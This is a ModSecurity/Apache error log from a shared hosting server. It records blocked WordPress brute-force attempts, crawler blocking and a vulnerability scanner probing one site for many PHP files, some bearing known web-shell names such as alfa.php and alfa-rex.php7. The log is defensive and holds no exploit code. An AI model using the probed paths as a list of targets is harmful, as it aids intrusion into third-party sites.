[Tue May 26 13:04:46.047810 2026] [security2:error] [pid 485064:tid 485225] [client 123.21.238.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqECmwAAAKQ"]
[Tue May 26 13:04:46.227009 2026] [security2:error] [pid 485064:tid 485226] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFj9tlF55stOmSqECsQAAAKU"]
[Tue May 26 13:04:46.575867 2026] [security2:error] [pid 485064:tid 485312] [client 144.217.135.217:36045] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFj9tlF55stOmSqECvAAAAPs"], referer: http://www.plenitudotonal.com/.well-known/security.txt
[Tue May 26 13:04:46.782312 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:65099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNFj9tlF55stOmSqECygAAAJQ"]
[Tue May 26 13:04:46.782483 2026] [security2:error] [pid 485064:tid 485209] [client 157.20.138.61:65099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNFj9tlF55stOmSqECygAAAJQ"]
[Tue May 26 13:04:46.825368 2026] [security2:error] [pid 485064:tid 485310] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFj9tlF55stOmSqECxAAAAPk"]
[Tue May 26 13:04:47.186553 2026] [security2:error] [pid 485064:tid 485314] [client 144.217.135.217:57735] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFz9tlF55stOmSqEC0QAAAP0"], referer: http://www.plenitudotonal.com/llms.txt
[Tue May 26 13:04:47.454863 2026] [security2:error] [pid 485064:tid 485197] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFz9tlF55stOmSqEC3gAAAIg"]
[Tue May 26 13:04:47.544178 2026] [security2:error] [pid 485064:tid 485278] [client 62.244.225.226:7907] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVNFz9tlF55stOmSqEC4AAAANk"]
[Tue May 26 13:04:47.814821 2026] [security2:error] [pid 485064:tid 485315] [client 144.217.135.217:47693] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFz9tlF55stOmSqEC7QAAAP4"], referer: http://www.plenitudotonal.com/humans.txt
[Tue May 26 13:04:48.771667 2026] [security2:error] [pid 485064:tid 485232] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNGD9tlF55stOmSqEDFQAAAKs"]
[Tue May 26 13:04:49.641276 2026] [autoindex:error] [pid 485064:tid 485319] [client 15.204.183.221:40364] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:04:50.369272 2026] [security2:error] [pid 485064:tid 485255] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNGT9tlF55stOmSqEDYAAAAMI"]
[Tue May 26 13:04:53.213730 2026] [security2:error] [pid 485064:tid 485290] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNHD9tlF55stOmSqED7wAAAOU"]
[Tue May 26 13:04:55.768840 2026] [security2:error] [pid 485064:tid 485275] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNHz9tlF55stOmSqEEYQAAANY"]
[Tue May 26 13:04:56.368858 2026] [security2:error] [pid 485064:tid 485154] [remote 23.100.97.57:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "autodiscover.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahVNID9tlF55stOmSqEEjQAA6lk"]
[Tue May 26 13:04:56.426345 2026] [security2:error] [pid 485064:tid 485154] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahVNID9tlF55stOmSqEEjQAA6lk"]
[Tue May 26 13:04:56.942493 2026] [security2:error] [pid 485064:tid 485146] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/2.php"] [unique_id "ahVNID9tlF55stOmSqEEpAAA7lE"]
[Tue May 26 13:04:57.114538 2026] [security2:error] [pid 485064:tid 485161] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/7.php"] [unique_id "ahVNIT9tlF55stOmSqEErgAA22A"]
[Tue May 26 13:04:57.288695 2026] [security2:error] [pid 485064:tid 485136] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/10.php"] [unique_id "ahVNIT9tlF55stOmSqEEuQAA00c"]
[Tue May 26 13:04:57.328884 2026] [security2:error] [pid 485064:tid 485207] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNID9tlF55stOmSqEEowAAAJI"]
[Tue May 26 13:04:57.370823 2026] [security2:error] [pid 485064:tid 485273] [client 157.20.138.61:65443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNIT9tlF55stOmSqEEtAAAANQ"]
[Tue May 26 13:04:57.370992 2026] [security2:error] [pid 485064:tid 485273] [client 157.20.138.61:65443] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNIT9tlF55stOmSqEEtAAAANQ"]
[Tue May 26 13:04:57.461088 2026] [security2:error] [pid 485064:tid 485131] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/13.php"] [unique_id "ahVNIT9tlF55stOmSqEEvgAAikI"]
[Tue May 26 13:04:57.632779 2026] [security2:error] [pid 485064:tid 485138] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/100.php"] [unique_id "ahVNIT9tlF55stOmSqEEwwAAqEk"]
[Tue May 26 13:04:57.808423 2026] [security2:error] [pid 485064:tid 485142] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/222.php"] [unique_id "ahVNIT9tlF55stOmSqEEzQAA600"]
[Tue May 26 13:04:57.980491 2026] [security2:error] [pid 485064:tid 485143] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/adminfuns.php"] [unique_id "ahVNIT9tlF55stOmSqEE1AAAqU4"]
[Tue May 26 13:04:58.153831 2026] [security2:error] [pid 485064:tid 485128] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/abcd.php"] [unique_id "ahVNIj9tlF55stOmSqEE3gAA1T8"]
[Tue May 26 13:04:58.354249 2026] [security2:error] [pid 485064:tid 485162] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/al.php"] [unique_id "ahVNIj9tlF55stOmSqEE5wAAt2E"]
[Tue May 26 13:04:58.552749 2026] [security2:error] [pid 485064:tid 485164] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/alfa.php"] [unique_id "ahVNIj9tlF55stOmSqEE7wAAtGM"]
[Tue May 26 13:04:58.726595 2026] [security2:error] [pid 485064:tid 485149] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/as.php"] [unique_id "ahVNIj9tlF55stOmSqEE8AAAklQ"]
[Tue May 26 13:04:58.897865 2026] [security2:error] [pid 485064:tid 485165] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/aa.php"] [unique_id "ahVNIj9tlF55stOmSqEFAgAAx2Q"]
[Tue May 26 13:04:58.983509 2026] [security2:error] [pid 485064:tid 485148] [remote 109.228.50.118:52682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVNIj9tlF55stOmSqEE9wAA01M"]
[Tue May 26 13:04:59.069331 2026] [security2:error] [pid 485064:tid 485145] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/abc.php"] [unique_id "ahVNIz9tlF55stOmSqEFCQAAwVA"]
[Tue May 26 13:04:59.240876 2026] [security2:error] [pid 485064:tid 485065] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/av.php"] [unique_id "ahVNIz9tlF55stOmSqEFDQAApAA"]
[Tue May 26 13:04:59.413157 2026] [security2:error] [pid 485064:tid 485178] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/autoload_classmap.php"] [unique_id "ahVNIz9tlF55stOmSqEFFAAAv3E"]
[Tue May 26 13:04:59.588901 2026] [security2:error] [pid 485064:tid 485134] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/asus.php"] [unique_id "ahVNIz9tlF55stOmSqEFGwAAnkU"]
[Tue May 26 13:04:59.793232 2026] [security2:error] [pid 485064:tid 485182] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/about.php"] [unique_id "ahVNIz9tlF55stOmSqEFIgAAmnU"]
[Tue May 26 13:04:59.964470 2026] [security2:error] [pid 485064:tid 485170] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/atomlib.php"] [unique_id "ahVNIz9tlF55stOmSqEFMAAA-Wk"]
[Tue May 26 13:05:00.138869 2026] [security2:error] [pid 485064:tid 485068] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/alfa-rex.php7"] [unique_id "ahVNJD9tlF55stOmSqEFNgAApgM"]
[Tue May 26 13:05:00.311331 2026] [security2:error] [pid 485064:tid 485171] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/b.php"] [unique_id "ahVNJD9tlF55stOmSqEFPQAA02o"]
[Tue May 26 13:05:00.392617 2026] [security2:error] [pid 485064:tid 485247] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNIz9tlF55stOmSqEFMQAAALo"]
[Tue May 26 13:05:00.485336 2026] [security2:error] [pid 485064:tid 485073] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/buy.php"] [unique_id "ahVNJD9tlF55stOmSqEFSwAAlgg"]
[Tue May 26 13:05:00.656584 2026] [security2:error] [pid 485064:tid 485187] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/bless.php"] [unique_id "ahVNJD9tlF55stOmSqEFUwAAi3o"]
[Tue May 26 13:05:00.830109 2026] [security2:error] [pid 485064:tid 485151] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/class-t.api.php"] [unique_id "ahVNJD9tlF55stOmSqEFXQAA6VY"]
[Tue May 26 13:05:01.001939 2026] [security2:error] [pid 485064:tid 485074] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/cache.php"] [unique_id "ahVNJT9tlF55stOmSqEFiQAA0wk"]
[Tue May 26 13:05:01.174369 2026] [security2:error] [pid 485064:tid 485080] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/content.php"] [unique_id "ahVNJT9tlF55stOmSqEFkAAA9A8"]
[Tue May 26 13:05:01.350220 2026] [security2:error] [pid 485064:tid 485089] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/classwithtostring.php"] [unique_id "ahVNJT9tlF55stOmSqEFlAAA5Bg"]
[Tue May 26 13:05:01.525511 2026] [security2:error] [pid 485064:tid 485174] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/css.php"] [unique_id "ahVNJT9tlF55stOmSqEFowAA-20"]
[Tue May 26 13:05:01.585315 2026] [security2:error] [pid 485064:tid 485206] [client 85.208.96.210:63830] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVNJT9tlF55stOmSqEFpwAAAJE"]
[Tue May 26 13:05:01.585412 2026] [security2:error] [pid 485064:tid 485206] [client 85.208.96.210:63830] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVNJT9tlF55stOmSqEFpwAAAJE"]
[Tue May 26 13:05:01.700493 2026] [security2:error] [pid 485064:tid 485071] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/chosen.php"] [unique_id "ahVNJT9tlF55stOmSqEFqwAAsQY"]
[Tue May 26 13:05:01.874271 2026] [security2:error] [pid 485064:tid 485076] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/doc.php"] [unique_id "ahVNJT9tlF55stOmSqEFtwAAsAs"]
[Tue May 26 13:05:01.902323 2026] [security2:error] [pid 485064:tid 485215] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNJT9tlF55stOmSqEFtgAAAJo"], referer: https://www.anujtradingco.com/
[Tue May 26 13:05:02.054256 2026] [security2:error] [pid 485064:tid 485090] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/elp.php"] [unique_id "ahVNJj9tlF55stOmSqEFxAAA5Rk"]
[Tue May 26 13:05:02.241303 2026] [security2:error] [pid 485064:tid 485169] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/Exception-class.php"] [unique_id "ahVNJj9tlF55stOmSqEFyAAA2mg"]
[Tue May 26 13:05:02.447016 2026] [security2:error] [pid 485064:tid 485133] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ee.php"] [unique_id "ahVNJj9tlF55stOmSqEF0QAA60Q"]
[Tue May 26 13:05:02.619251 2026] [security2:error] [pid 485064:tid 485100] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/edit.php"] [unique_id "ahVNJj9tlF55stOmSqEF3AAAnyM"]
[Tue May 26 13:05:02.640214 2026] [security2:error] [pid 485064:tid 485218] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNJj9tlF55stOmSqEF2wAAAJ0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460628&moderation-hash=8e6d757da7318ad697c4f61b282022af
[Tue May 26 13:05:02.791969 2026] [security2:error] [pid 485064:tid 485112] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/f35.php"] [unique_id "ahVNJj9tlF55stOmSqEF5QAA4y8"]
[Tue May 26 13:05:02.969926 2026] [security2:error] [pid 485064:tid 485121] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/fff.php"] [unique_id "ahVNJj9tlF55stOmSqEF7QAA0jg"]
